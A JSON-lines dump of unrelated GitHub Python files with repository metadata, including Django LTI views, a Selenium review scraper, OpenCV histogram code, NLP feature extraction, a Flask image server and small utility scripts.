+{"seq_id":"69848115953","text":"# -*- coding: UTF-8 -*-\n\nimport os\n\nfrom django.http import Http404\nfrom django.shortcuts import redirect\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse\nfrom wsgiref.util import FileWrapper\n\nfrom m_common import *\n\n__copyright__ = 'Copyright (c) 2016 The University of Texas at Austin'\n__author__ = 'mccookpv'\n\n\ndef download_adhoc_zip(request):\n \"\"\"\n Download the Nanosourcer ad-hoc query results as a zip compressed file.\n \"\"\"\n\n logger_main.info('download_adhoc_zip check 001')\n\n zipfile = \"{0}/db/ddl/queries/nanosourcer_csv.zip\".format(settings.BASE_DIR)\n logger_main.info('download_adhoc_zip check 002')\n\n context_vars = {}\n\n if not os.path.exists(zipfile):\n context_vars['err_title'] = 'No zip file exists.'\n context_vars['err_message'] = 'No zip file was found.'\n response = render_to_response('lobby/lti_error.html',\n context_vars,\n context_instance=RequestContext(request),\n )\n set_response_meta_nocache(response)\n return response\n\n logger_main.info('zipfile {0}'.format(zipfile))\n\n zf = open(zipfile, \"rb\")\n\n response = HttpResponse(FileWrapper(zf), content_type='application/zip')\n logger_main.info('download_adhoc_zip check 003')\n response['Content-Disposition'] = 'attachment; filename=nanosourcer_csv.zip'\n logger_main.info('download_adhoc_zip check 004')\n return response\n\ndef queryzip(request,\n config_key=None):\n\n context_vars = {'lti_session_key'}\n\n response = render_to_response('temp_query_zip_download.html',\n context_vars,\n context_instance=RequestContext(request),\n )\n set_response_meta_nocache(response)\n return response\n\n@csrf_exempt\ndef assignment_lti_config(request, config_key=None):\n\n response = render_to_response(\"config/assignment.xml\",\n context_vars,\n content_type=\"application/xml; charset=utf-8\",\n context_instance=RequestContext(request))\n\n\n set_response_meta_nocache(response)\n\n return response\n\n@csrf_exempt\ndef nav_lti_config(request,\n config_key=None):\n \"\"\"\n Returns a prepared LTI XML configuration file to the LMS LTI app installation.\n\n https:///\n https:///config/main\n \"\"\"\n\n if not config_key:\n config_key = \"main\"\n\n config_root = \"{0}/templates/config\".format(settings.PROJECT_ROOT)\n\n path = \"{0}/{1}.xml\".format(config_root,\n config_key)\n\n if not os.path.exists(path):\n raise Http404()\n\n app_url = request.build_absolute_uri('/')\n\n context_vars = dict()\n context_vars['entry_root_url'] = app_url\n context_vars['server_env'] = settings.SERVER_ENV\n\n response = render_to_response(\"config/{0}.xml\".format(config_key),\n context_vars,\n content_type=\"application/xml; charset=utf-8\",\n context_instance=RequestContext(request))\n\n set_response_meta_nocache(response)\n\n return response\n\n\n@csrf_exempt\ndef nav_main(request):\n\n p = \"nav_main\"\n\n context_vars = {}\n\n lti_session_key = request.session.get('lti_session_key', None)\n\n # is_launch = request.session.get('is_launch')\n #\n # if is_launch:\n # request.session['is_launch'] = 0\n #\n # context_vars['is_lti_launch'] = 1\n # context_vars['lti_session_key'] = lti_session_key\n #\n # # response = render_to_response('launcher.html',\n # # context_vars,\n # # context_instance=RequestContext(request),\n # # )\n # # set_response_meta_nocache(response)\n #\n # return redirect(\"/main/?lk=\" + lti_session_key)\n\n if not lti_session_key:\n context_vars['err_title'] = 'Invalid session.'\n context_vars['err_message'] = 'No session data found. Please relaunch application from Canvas.'\n response = render_to_response('lobby/lti_error.html',\n context_vars,\n context_instance=RequestContext(request),\n )\n set_response_meta_nocache(response)\n return response\n\n lti_session_data = request.session.get(lti_session_key)\n\n roles = lti_session_data.get('roles', None)\n user_role_list = get_user_role_list(roles)\n\n if is_valid_role(lti_session_data,\n user_role_list,\n ['admin', 'instructor', 'ta']):\n\n entry_url = \"/admin/?lk={0}\".format(lti_session_key)\n\n rr = redirect(entry_url)\n return rr\n\n elif is_valid_role(lti_session_data,\n user_role_list=user_role_list,\n role_verify_list=['student']):\n\n entry_url = \"/view/?lk={0}\".format(lti_session_key)\n\n rr = redirect(entry_url)\n return rr\n\n else:\n\n context_vars['err_title'] = 'Unauthorized.'\n context_vars['err_message'] = 'You are not authorized to access this application.'\n\n response = render_to_response('lobby/lti_error.html',\n context_vars,\n context_instance=RequestContext(request))\n set_response_meta_nocache(response)\n return response\n\ndef logout(request):\n\n context_vars = {}\n\n lti_session_key = request.session['lti_session_key']\n\n request.session['lti_session_key'] = None\n request.session[lti_session_key] = None\n\n response = render_to_response('lobby/lti_session_end.html',\n context_vars,\n context_instance=RequestContext(request),\n )\n set_response_meta_nocache(response)\n return response\n\n","repo_name":"nanosourcer/nanosourcer-lti","sub_path":"django_nanosourcer/views/v_main.py","file_name":"v_main.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"12168336887","text":"#!/usr/bin/env python\nfrom os import popen\nimport _thread\n\"\"\"get option from device input\"\"\"\n\"\"\"\n\t1.get shell pip(command \"getevent\")\n\t2.read pip output info(read event4)\n\t3.deal info (change hex to oct)\n\t4.save info\n\"\"\"\ndef getInputCommand(shell_stream):\t\n\tcommand = input(\">>>\")\n\tshell_stream.write(\"input text %s\"%command)\n\nwith popen(r\"adb shell\",\"w\") as shell_stream:\n\tstrs = \"string\"\n\ttry:\n\t\tshell_stream.write(\"input text %s\" % strs)\n\t\t# _thread.start_new_thread(getInputCommand, (shell_stream,))\n\texcept Exception as e:\n\t\traise e\n\t# while True:\n\t# \tprint(shell_stream.read())\n\n\"\"\"\nwith popen(r\"adb shell getevent\",\"r\") as shell_stream:\n\twhile True:\n\t\tinfo = shell_stream.read()\n\t\tprint(info)\n\"\"\"","repo_name":"bread-kun/personal_py_pro","sub_path":"任务/记录操作/readOption.py","file_name":"readOption.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5823326443","text":"from selenium.webdriver.support.wait import WebDriverWait\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom bs4 import BeautifulSoup\nfrom time import sleep\nfrom data.model.review_model import Review\nfrom service.review_service import ReviewService\n\nclass AmzReviewScrapper ():\n target_url: str = ''\n page: int = 1\n max_page: int = 11\n que: list = []\n\n def __init__(self, target_url: str) -> None:\n self.target_url = target_url\n self.driver = webdriver.Chrome()\n self.wait = WebDriverWait(self.driver, 10)\n\n\n def wait_until_visible(self, xpath):\n return self.wait.until(EC.visibility_of_element_located((By.XPATH, xpath)))\n\n\n def find_by_xpath(self, xpath):\n try:\n return self.driver.find_element(By.XPATH, xpath)\n except:\n return None\n \n\n def get_html_from_target(self, target):\n return BeautifulSoup(target.get_attribute('outerHTML'), 'html.parser')\n\n\n def open_browser(self):\n self.driver.get('https://www.amazon.com/')\n sleep(2)\n self.driver.get(self.target_url)\n self.wait_until_visible('//*[@id=\"cm_cr-review_list\"]')\n\n\n def get_list_container(self):\n sleep(2)\n return self.get_html_from_target(self.driver.find_element(By.XPATH, '//*[@id=\"cm_cr-review_list\"]'))\n \n\n def scrap_data(self):\n reviews = self.get_list_container().find_all(attrs={\"data-hook\" : 'review'})\n\n for r in reviews:\n id = r['id']\n title = r.find(attrs={'data-hook': 'review-title'}).find('span', class_='a-letter-space').find_next_sibling('span').get_text()\n rating = r.find(attrs={'data-hook': 'review-title'}).find('i').find('span').get_text()[0:3]\n country = r.find(attrs={'data-hook': 'review-date'}).get_text().split('Reviewed in the ')[-1].split('on')[0].strip()\n date = r.find(attrs={'data-hook': 'review-date'}).get_text().split(' on ')[-1]\n vp = r.find(attrs={'data-hook': 'avp-badge'}).get_text() == 'Verified Purchase' if True else False\n review = r.find(attrs={'data-hook' : 'review-body'}).get_text().strip()\n name = r.find(attrs={'data-hook': 'genome-widget'}).find('span', class_='a-profile-name').get_text().strip()\n\n images = []\n\n try:\n imgs = r.find_all('div', class_='review-image-container')\n if(len(imgs) > 0):\n for img in imgs:\n images.append(img.find('img')['src'])\n except Exception as e: \n print(e)\n images = []\n\n try:\n video = r.find('div', id=f'review-video-id-{id}')['data-video-url']\n except Exception as e: \n print(e)\n video = ''\n\n print(id)\n print(title)\n print(rating)\n print(country)\n print(date)\n print(vp)\n # print(review)\n print(images)\n print(video)\n print(name)\n\n review = Review(id=id, review=review, country=country, date=date, pictures=images, rating=rating, vp=vp, title=title, video=video, name=name)\n self.que.insert(0, review)\n\n\n sleep(2)\n self.page = self.page + 1\n\n if(self.page < self.max_page):\n next_page_btn = self.find_by_xpath('//*[@id=\"cm_cr-pagination_bar\"]/ul/li[2]/a')\n next_page_btn.click()\n sleep(1)\n\n self.scrap_data()\n else:\n return\n\n\n def start(self): \n review_service = ReviewService()\n self.open_browser()\n\n try:\n self.scrap_data()\n except Exception as e:\n print(f'scrap error {e}')\n review_service.insert_reviews(self.que)\n\n review_service.insert_reviews(self.que)","repo_name":"GCnomore/craig_scrap","sub_path":"scrapper/amz_review_scrapper.py","file_name":"amz_review_scrapper.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16659281130","text":"class ExceptionMessage:\n\t\"\"\"The exception message object to be passed to another process\n\t\"\"\"\n\n\tdef __init__(self, process_name, exc_msg):\n\t\tself.process_name = process_name\n\t\tself.exc_msg = exc_msg\n\ndef trim_callstack(exception_msg: str, target_user_file: str):\n\t\"\"\"\n\tShorten the call stack to the starting point of the user script\n\t\"\"\"\n\texception_msg_list = exception_msg.splitlines(keepends = True)\n\t# Store title\n\ttrimmed_msg = exception_msg_list[0]\n\n\t# Find the starting point\n\ti = 0\n\tfor i in range(2, len(exception_msg_list)):\n\t\tif target_user_file in exception_msg_list[i]:\n\t\t\tbreak\n\n\treturn trimmed_msg + \"\".join(exception_msg_list[i:])\n","repo_name":"iYunghui/MLGame-Pingpong","sub_path":"essential/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72109773233","text":"import pyautogui\nimport time\nimport xlrd\nimport pyperclip\n\nimg2 = r\"pic/Screenshot 2022-09-06 183945.png\"\nimg1 = r\"pic/Screenshot 2022-09-06 183537.png\"\nclickTimes = 1\nlOrR = 'left'\nlocation = pyautogui.locateCenterOnScreen(img2, confidence=0.9)\npyautogui.click(location.x, location.y, clicks=clickTimes, interval=0.2, duration=0.2, button=lOrR)\nwhile True:\n location = pyautogui.locateCenterOnScreen(img1, confidence=0.8)\n if location is not None:\n pyautogui.click(location.x, location.y, clicks=clickTimes, interval=0.2, duration=0.2, button=lOrR)\n else:\n pyautogui.moveTo(1000, 1000)\n pyautogui.scroll(-500)\n","repo_name":"Yeqi-Fang/Spyder","sub_path":"spyder_files/点赞.py","file_name":"点赞.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"31107658558","text":"import cv2.cv as cv\n\nim = cv.LoadImage(\"../img/lena.jpg\", cv.CV_8U)\n\ncv.SetImageROI(im, (1, 1,30,30))\n\nhistsize = 256 #Because we are working on grayscale pictures\nhist = cv.CreateHist([histsize], cv.CV_HIST_ARRAY, [[0,histsize]], 1)\ncv.CalcHist([im], hist)\n\n\ncv.NormalizeHist(hist,1) # The factor rescale values by multiplying values by the factor\n_,max_value,_,_ = cv.GetMinMaxHistValue(hist)\n\nif max_value == 0:\n max_value = 1.0\ncv.NormalizeHist(hist,256/max_value)\n\ncv.ResetImageROI(im)\n\nres = cv.CreateMat(im.height, im.width, cv.CV_8U)\ncv.CalcBackProject([im], res, hist)\n\ncv.Rectangle(im, (1,1), (30,30), (0,0,255), 2, cv.CV_FILLED)\ncv.ShowImage(\"Original Image\", im)\ncv.ShowImage(\"BackProjected\", res)\n#--------------------------------------------------------\n\n\n'''\n# For colored pictures !\nim = cv.LoadImage(\"../img/lena.jpg\")\n\nr = cv.CreateImage(cv.GetSize(im), 8, cv.CV_8UC1)\ng = cv.CreateImage(cv.GetSize(im), 8, cv.CV_8UC1)\nb = cv.CreateImage(cv.GetSize(im), 8, cv.CV_8UC1)\ncv.Split(im, r, g, b, None)\n\ncv.SetImageROI(r, (1, 1,30,30))\ncv.SetImageROI(g, (1, 1,30,30))\ncv.SetImageROI(b, (1, 1,30,30))\nplanes = [r,g,b]\n\nhistsize = [256,256,256]\n\nhist = cv.CreateHist(histsize, cv.CV_HIST_ARRAY, [[0,256],[0,256],[0,256]], 1)\ncv.CalcHist([cv.GetImage(i) for i in planes], hist)\n\ncv.NormalizeHist(hist,1)\n_,max_value,_,_ = cv.GetMinMaxHistValue(hist)\n\nif max_value == 0:\n max_value = 1.0\n \ncv.NormalizeHist(hist,1/max_value)\n\ncv.ResetImageROI(r)\ncv.ResetImageROI(g)\ncv.ResetImageROI(b)\n\n\nres = cv.CreateImage((im.width,im.height), 8, 3)\ncv.CalcBackProject([r,g,b], res, hist)\n\nthresh = cv.CloneImage(res)\ncv.Threshold(thresh, thresh, 1.0, 256, cv.CV_THRESH_BINARY)\n\n\ncv.Rectangle(im, (1,1), (30,30), (0,0,255), 2, cv.CV_FILLED)\ncv.ShowImage(\"Original Image\", im)\ncv.ShowImage(\"Threshed\", thresh)\ncv.ShowImage(\"BackProjected\", res)\n'''\n\ncv.WaitKey(0)","repo_name":"RobinDavid/OpenCV-tutorials","sub_path":"image/4b-backprojecting.py","file_name":"4b-backprojecting.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"39"} +{"seq_id":"26227632652","text":"n=int(input(\"Enter a number to wheather it is palindrome or not :\"))\ntemp=n\nd=0\nwhile n!=0:\n r=n%10\n d=d*10+r\n n=n//10\nprint(d) \nif temp==d:\n print(\"Number is Palindrome\")\nelse:\n print(\"Number is not palindrome\")\ninput()\n","repo_name":"praveenchandra01/Python","sub_path":"Basic Python Programs/Palindrome.py","file_name":"Palindrome.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"14968852918","text":"import os\n\nfrom gitflow import _, repotools\nfrom gitflow.common import Result\nfrom gitflow.context import Context\nfrom gitflow.procedures.common import get_branch_by_branch_name_or_version_tag, get_command_context, check_in_repo\nfrom gitflow.repotools import BranchSelection\n\n\ndef call(context: Context) -> Result:\n command_context = get_command_context(\n context=context,\n object_arg=context.args['']\n )\n\n check_in_repo(command_context)\n\n object_arg = context.args['']\n args = context.args['']\n\n if object_arg is not None:\n selected_branch = get_branch_by_branch_name_or_version_tag(context, object_arg,\n BranchSelection.BRANCH_PREFER_LOCAL)\n if selected_branch is None:\n command_context.fail(os.EX_USAGE,\n _(\"Log failed.\"),\n _(\"Failed to resolve an object for token {object}.\")\n .format(object=repr(object_arg))\n )\n else:\n selected_branch = None\n\n log_command = ['log']\n if context.pretty:\n log_command.append('--pretty')\n if context.dry_run:\n log_command.append('--dry-run')\n if context.verbose:\n log_command.append('--verbose')\n if selected_branch is not None:\n log_command.append(selected_branch)\n\n proc = repotools.git_interactive(context.repo, *(log_command + args))\n proc.wait()\n\n return context.result\n","repo_name":"abacusresearch/gitflow","sub_path":"gitflow/procedures/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"588497580","text":"\"\"\"\nAut: Sidratul MT\nALG: Bubble sort\nComp: (n2)\nDate: 16.Aug.2020\nTime: 13:00\nDone\"\"\"\n\nar = [2, 4, 1, 6, 3, 6, 3, 9, 2, 12, 4, 12, 78 ,34 ,43, 33, 0]\nfor i in range(len(ar)):\n for j in range(len(ar)-1):\n if ar[j] > ar[j+1]:\n a = ar[j+1]\n ar[j+1] = ar[j]\n ar[j] = a\n print(ar[j+1], ar[j])\n\nprint(ar)\n","repo_name":"sidratul-muntaher/Algorithms","sub_path":"Sort/buble.py","file_name":"buble.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"35418754864","text":"\"\"\"Prepration for runners\"\"\"\nfrom __future__ import annotations\n\nimport os\nfrom datetime import datetime, timezone\nfrom pathlib import Path\nfrom shutil import rmtree\nfrom tempfile import mkdtemp\nfrom typing import TYPE_CHECKING\n\nfrom monty.shutil import copy_r, gzip_dir\n\nfrom quacc import SETTINGS\nfrom quacc.atoms.core import copy_atoms\nfrom quacc.utils.files import copy_decompress, make_unique_dir\n\nif TYPE_CHECKING:\n from ase import Atoms\n\n\ndef calc_setup(\n atoms: Atoms, copy_files: list[str | Path] | None = None\n) -> tuple[Atoms, Path, Path]:\n \"\"\"\n Perform staging operations for a calculation, including copying files to the scratch\n directory, setting the calculator's directory, decompressing files, and creating a\n symlink to the scratch directory.\n\n Parameters\n ----------\n atoms\n The Atoms object to run the calculation on.\n copy_files\n Filenames to copy from source to scratch directory.\n\n Returns\n -------\n Atoms\n The input Atoms object.\n Path\n The path to the tmpdir, where the calculation will be run. It will be\n deleted after the calculation is complete.\n Path\n The path to the results_dir, where the files will ultimately be stored.\n A symlink to the tmpdir will be made here during the calculation for\n convenience.\n \"\"\"\n\n # Don't modify the original atoms object\n atoms = copy_atoms(atoms)\n\n # Set where to store the results\n job_results_dir = (\n make_unique_dir(base_path=SETTINGS.RESULTS_DIR)\n if SETTINGS.CREATE_UNIQUE_WORKDIR\n else SETTINGS.RESULTS_DIR\n )\n\n # Create a tmpdir for the calculation within the scratch_dir\n time_now = datetime.now(timezone.utc).strftime(\"%Y-%m-%d-%H-%M-%S-%f\")\n tmpdir = Path(\n mkdtemp(prefix=f\"quacc-tmp-{time_now}-\", dir=SETTINGS.SCRATCH_DIR)\n ).resolve()\n\n # Create a symlink to the tmpdir in the results_dir\n if os.name != \"nt\" and SETTINGS.SCRATCH_DIR != SETTINGS.RESULTS_DIR:\n symlink = job_results_dir / f\"{tmpdir.name}-symlink\"\n symlink.unlink(missing_ok=True)\n symlink.symlink_to(tmpdir, target_is_directory=True)\n\n # Copy files to tmpdir and decompress them if needed\n if copy_files:\n copy_decompress(copy_files, tmpdir)\n\n os.chdir(tmpdir)\n\n return atoms, tmpdir, job_results_dir\n\n\ndef calc_cleanup(tmpdir: str | Path, job_results_dir: str | Path) -> None:\n \"\"\"\n Perform cleanup operations for a calculation, including gzipping files, copying\n files back to the original directory, and removing the tmpdir.\n\n Parameters\n ----------\n tmpdir\n The path to the tmpdir, where the calculation will be run. It will be\n deleted after the calculation is complete.\n job_results_dir\n The path to the job_results_dir, where the files will ultimately be\n stored. A symlink to the tmpdir will be made here during the calculation\n for convenience.\n\n Returns\n -------\n None\n \"\"\"\n\n # Change to the results directory\n os.chdir(job_results_dir)\n\n # Gzip files in tmpdir\n if SETTINGS.GZIP_FILES:\n gzip_dir(tmpdir)\n\n # Copy files back to job_results_dir\n copy_r(tmpdir, job_results_dir)\n\n # Remove symlink to tmpdir\n symlink_path = job_results_dir / f\"{tmpdir.name}-symlink\"\n symlink_path.unlink(missing_ok=True)\n\n # Remove the tmpdir\n rmtree(tmpdir, ignore_errors=True)\n","repo_name":"arosen93/quacc","sub_path":"src/quacc/runners/prep.py","file_name":"prep.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"39"} +{"seq_id":"33036641415","text":"from ..bot.Bot import Bot\nfrom ..bot.Oracle import Oracle\nfrom ..bot.Mint import Mint \n\nfrom terra_sdk.client.lcd import LCDClient\nfrom dotenv import load_dotenv\nimport os, sys, time\n\nload_dotenv() \nnetwork = \"testnet\"\nORACLE_CONTRACT_ADDR = os.getenv('ORACLE_CONTRACT_ADDR')\nSCA_CONTRACT_ADDR = os.getenv('SCA_CONTRACT_ADDR')\nMINT_CONTRACT_ADDR = os.getenv('MINT_CONTRACT_ADDR')\n\ndeployer_key = os.environ.get(\"MNEMONIC_KEY\")\n\nbot = Bot(network, deployer_key)\ndeployer = bot.get_deployer()\nprint(deployer.key.acc_address)\n\noracle = Oracle(network, deployer_key, None, ORACLE_CONTRACT_ADDR)\nmint = Mint(network, deployer_key, None, MINT_CONTRACT_ADDR)\n\n\nprices = [250, 172, 163, 185, 190]\nmultiplier = 1000000\n\ni = 0\n\n\nrandom = False \nmax_range = 0.5\nwhile True:\n cprice = prices[i] * multiplier; \n oracle.set_price(deployer, SCA_CONTRACT_ADDR, str(cprice))\n mint.mass_update(deployer) \n\n i+= 1\n if i == len(prices):\n i = 0\n\n time.sleep(5)","repo_name":"1CentLab/Synthetic-Crypto-Assets-Contract","sub_path":"scripts/worker/update_price.py","file_name":"update_price.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"41017831151","text":"\ndef isPrime(n):\n if n<2:\n return False\n else:\n for i in range(2,n):\n if n%i == 0:\n return False\n return True\n\ndef main():\n n = 10\n answer = []\n for i in range(1,n+1):\n if(isPrime(i)):\n answer.append(i)\n print(answer)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"tae2089/algorithm","sub_path":"python/etc/find_prime_numbers.py","file_name":"find_prime_numbers.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71244018673","text":"import numpy\n\nPARAMETERS_NUMBER = 3\nINPUTS_NUMBER = 3\nSAMPLES_NUMBER = 200\n\nclass SystemLinearizer:\n samplesCount = 0\n\n def __init__( self ):\n self.statesList = numpy.zeros( ( SAMPLES_NUMBER, PARAMETERS_NUMBER ) )\n self.inputsList = numpy.zeros( ( SAMPLES_NUMBER, INPUTS_NUMBER ) )\n \n def AddSample( self, position, velocity, acceleration, inputForce, outputForce ):\n sampleIndex = self.samplesCount % SAMPLES_NUMBER\n self.statesList[ sampleIndex ][ 0 ] = acceleration\n self.statesList[ sampleIndex ][ 1 ] = velocity\n self.statesList[ sampleIndex ][ 2 ] = position\n self.inputsList[ sampleIndex ][ 0 ] = inputForce\n self.inputsList[ sampleIndex ][ 1 ] = outputForce\n self.inputsList[ sampleIndex ][ 2 ] = inputForce + outputForce\n self.samplesCount += 1\n \n def IdentifySystem( self, defaultImpedance ):\n inputImpedance = defaultImpedance\n outputImpedance = defaultImpedance\n plantImpedance = defaultImpedance\n if self.samplesCount >= SAMPLES_NUMBER:\n parameters, residuals, rank, s = numpy.linalg.lstsq( self.statesList, self.inputsList, rcond=None )\n inputImpedance = numpy.maximum( ( parameters[ 0 ][ 0 ], parameters[ 1 ][ 0 ], parameters[ 2 ][ 0 ] ), ( 0.0, 0.0, 0.0 ) )\n outputImpedance = numpy.maximum( ( parameters[ 0 ][ 1 ], parameters[ 1 ][ 1 ], parameters[ 2 ][ 1 ] ), ( 0.0, 0.0, 0.0 ) )\n plantImpedance = numpy.maximum( ( parameters[ 0 ][ 2 ], parameters[ 1 ][ 2 ], parameters[ 2 ][ 2 ] ), ( 0.0, 0.0, 0.0 ) )\n \n return ( inputImpedance, outputImpedance, plantImpedance )\n","repo_name":"EESC-MKGroup/OSim-Telerehab-Simulator","sub_path":"system_linearizer.py","file_name":"system_linearizer.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"17099392027","text":"import numpy as np\nimport nltk\nfrom nltk.util import ngrams\nfrom collections import Counter\nfrom stanfordcorenlp import StanfordCoreNLP\nimport spacy\nimport json\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n\n\nSTANFORD_MODEL_PATH = 'models/stanford-corenlp-full-2016-10-31'\nSPACY_MODEL = 'en_core_web_md'\n\n\nSENTENCES = \"sentences\"\nSENTIMENT = \"sentiment\"\nSENTIMENT_VALUE = \"sentimentValue\"\nSENTIMENT_ANNOTATOR = {'annotators':'sentiment', 'pipelineLanguage':'en', 'outputFormat':'json'}\nSENTIMENT_INDEX = {\"Positive\": 0,\n \"Neutral\": 1,\n \"Negative\": 2,\n \"Verynegative\":3}\n\n\nNGRAM_SIZE = 100\n\nMAX_DF = 0.8\nMIN_DF = 5\nMAX_FEATURES = 2000\n\nclass Features:\n def __init__(self):\n self.stanford_nlp = StanfordCoreNLP(STANFORD_MODEL_PATH)\n self.spacy_nlp = spacy.load(SPACY_MODEL)\n self.tfidf = TfidfVectorizer(min_df = MIN_DF,\n max_df = MAX_DF,\n max_features = MAX_FEATURES,\n stop_words = 'english',\n norm = 'l2'\n )\n\n def get_features(self, t, is_train):\n doc_vocab_mat,lookup = self._get_tfidf(t, is_train)\n bigram_counts = self._get_ngram_counts(t, 2)\n trigram_counts = self._get_ngram_counts(t, 3)\n\n sentiments = self._get_sentiment(t)\n sent_len = self._get_average_sent_length(t)\n vector = np.hstack((doc_vocab_mat, bigram_counts, trigram_counts, sentiments, sent_len))\n return vector.astype(np.float32), lookup\n\n def _get_tfidf(self, lines, is_train):\n if is_train:\n doc_vocab_mat = self.tfidf.fit_transform(lines).toarray()\n else:\n doc_vocab_mat = self.tfidf.transform(lines).toarray()\n lookup = {i:v for i, v in enumerate(self.tfidf.get_feature_names())}\n return doc_vocab_mat, lookup\n\n def _get_average_sent_length(self, t):\n result = np.zeros((len(t),1))\n for i,doc in enumerate(t):\n sents = nltk.sent_tokenize(doc)\n length = 0\n for sent in sents:\n words = nltk.word_tokenize(sent)\n length += len(words)\n sen_len = length/len(sents)\n result[i] = np.clip(sen_len/25, 0,1)\n return result\n\n def _get_ngram_counts(self, t, n=2):\n tokens = [nltk.word_tokenize(doc) for doc in t]\n flattened = [item for sublist in tokens for item in sublist]\n n_grams = Counter(ngrams(flattened, n)).most_common(NGRAM_SIZE)\n result = np.zeros((len(t), NGRAM_SIZE))\n for i,doc in enumerate(tokens):\n ngram = Counter(ngrams(doc, n))\n for j,key in enumerate(n_grams):\n count = ngram.get(key,0)\n result[i,j]=count\n return result\n\n def _get_sentiment(self, t):\n sentiments = np.zeros((len(t), len(SENTIMENT_INDEX)))\n for i, doc in enumerate(t):\n tagged = self.stanford_nlp.annotate(doc, properties = SENTIMENT_ANNOTATOR)\n try:\n sentences = json.loads(tagged)[SENTENCES]\n sents = np.zeros(len(SENTIMENT_INDEX))\n for sent in sentences:\n sentimentValue = int(sent[SENTIMENT_VALUE])\n sentiment = sent[SENTIMENT]\n ind = SENTIMENT_INDEX[sentiment]\n sents[ind] += sentimentValue\n sentiments[i] = sents/len(sentences)\n except Exception as e:\n print(i, tagged)\n return sentiments","repo_name":"YuntianLan/Who-are-you-on-screen","sub_path":"app/mlsystem/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"39"} +{"seq_id":"16716551225","text":"from flask import Flask, send_from_directory, jsonify\nimport os\nimport random\napp = Flask(__name__)\n\n# Change this to the path of your directory containing images\nIMAGE_FOLDER = \"./imgs\"\n\n@app.route('/images', methods=['GET'])\ndef serve_random_image():\n \"\"\"Serve a random image from the IMAGE_FOLDER.\"\"\"\n files = os.listdir(IMAGE_FOLDER)\n images = [f for f in files if f.endswith(('jpeg', 'png', 'jpg', 'gif'))]\n if not images:\n return \"No images found\", 404\n selected_image = random.choice(images)\n return send_from_directory(IMAGE_FOLDER, selected_image)\n\n@app.route('/images/', methods=['GET'])\ndef serve_image(filename):\n \"\"\"Serve an image from the IMAGE_FOLDER.\"\"\"\n return send_from_directory(IMAGE_FOLDER, filename)\n\nif __name__ == '__main__':\n app.run(port=5001)\n","repo_name":"megamen32/FootballTracker","sub_path":"data_server/data_server.py","file_name":"data_server.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"20891988120","text":"import remotefile\r\nimport threading\r\nimport abc\r\nimport sys\r\n\r\nclass NodeDataHandler(metaclass=abc.ABCMeta):\r\n @abc.abstractmethod\r\n def inPortDataWriteNotify(self, file, write_offset : int, write_len : int):\r\n \"\"\"\r\n Notification called when inPortDataFile has been written to (from ApxFileManager)\r\n \"\"\"\r\n @abc.abstractmethod\r\n def inPortDataOpen(self, file):\r\n \"\"\"\r\n Called when APX server has requested to open the nodes input file\r\n \"\"\"\r\n\r\n\r\nclass File(remotefile.File):\r\n \"\"\"\r\n This is the apx.File class. It inherits from remotefile.File.\r\n \r\n In the C implementation this type is called apx_file_t.\r\n \"\"\"\r\n def __init__(self, name, length, init_data=None):\r\n super().__init__(name, length)\r\n self.data = bytearray(length)\r\n self.dataLock = threading.Lock()\r\n self.fileManager = None\r\n if init_data is not None:\r\n if len(init_data) != length:\r\n raise ValueError('Length of init_data must be equal to length argument') \r\n self.data[0:length]=init_data\r\n\r\n def read(self, offset: int, length: int):\r\n \"\"\"\r\n reads data from the given offset, returns bytes array or None in case of error\r\n \"\"\"\r\n if(offset < 0) or (offset+length>len(self.data) ):\r\n print('file read outside file boundary detected, file=%s, off=%d, len=%d'%(self.name, offset, len(self.data)),file=sys.stderr)\r\n return None\r\n self.dataLock.acquire()\r\n retval = bytes(self.data[offset:offset+length])\r\n self.dataLock.release()\r\n return retval\r\n \r\n \r\n def write(self, offset: int, data: bytes):\r\n \"\"\"\r\n writes data at the given offset in the file\r\n returns number of bytes written or -1 on error\r\n \"\"\"\r\n if(offset < 0) or (offset+len(data)>len(self.data) ):\r\n print('file write outside file boundary detected, file=%s, off=%d, len=%d'%(self.name, offset, len(data)),file=sys.stderr)\r\n return -1\r\n self.dataLock.acquire()\r\n self.data[offset:offset+len(data)]=data\r\n self.dataLock.release()\r\n return len(data)\r\n 